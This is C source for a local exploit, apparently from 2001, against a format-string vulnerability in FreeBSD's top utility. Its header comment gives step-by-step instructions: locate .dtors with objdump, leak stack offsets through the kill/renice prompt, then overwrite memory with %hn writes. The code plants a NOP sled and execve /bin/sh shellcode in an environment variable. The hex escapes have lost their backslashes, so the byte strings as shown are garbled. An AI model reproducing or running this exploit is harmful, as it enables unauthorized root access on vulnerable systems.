/*
 * freebsd x86 top exploit
 * affected under top-3.5beta9 ( including this version )
 *
 * 1. get the address of .dtors from /usr/bin/top using objdump ,
 *
 * 'objdump -s -j .dtors /usr/bin/top'
 *
 * 2. divide it into four parts, and set it up into an environment variable like "XSEO="
 *
 * 3. run top, then find "your parted addresses from "kill" or "renice" command like this
 *
 * 'k %200$p' or 'r 2000 %200$p'
 *
 * 4. do exploit !
 *
 * 'k %190u%230$hn' <== 0xbf (4)
 * 'k %190u%229$hn' <== 0xbf (3)
 * 'k %214u%228$hn' <== 0xd7 (2)
 * 'k %118u%227$hn' <== 0x77 (1)
 *
 * truefinder , seo@igrus.inha.ac.kr
 * thx mat, labman, zen-parse
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#define NOP 0x90
#define BUFSIZE 2048
 
char fmt[]=
"XSEO="
/* you would meet above things from 'k %200$p', it's confirming strings*/
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
/* .dtors's address in BSD*/
"x08xffx04x08"
"x09xffx04x08"
"x0axffx04x08"
"x0bxffx04x08"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
 
/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */
 
char sc[]=
"x31xc0x50x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x50x53x50x54x53"
"xb0x3bx50xcdx80"; /* bigwaks 23 bytes shellcode */
 
int
main(void)
{
        char scbuf[BUFSIZE];
        char *scp;
 
        scp = (char*)scbuf;
        memset( scbuf, NOP, BUFSIZE );
 
        scp += ( BUFSIZE - strlen(sc) - 1);
        memcpy( scp, sc ,strlen(sc));
 
        scbuf[ BUFSIZE - 1] = '';
 
        memcpy( scbuf, "EGG=", 4);
 
        putenv(fmt);
        putenv(scbuf);
 
        system("/bin/bash");
}

// www.Syue.com [2001-07-23]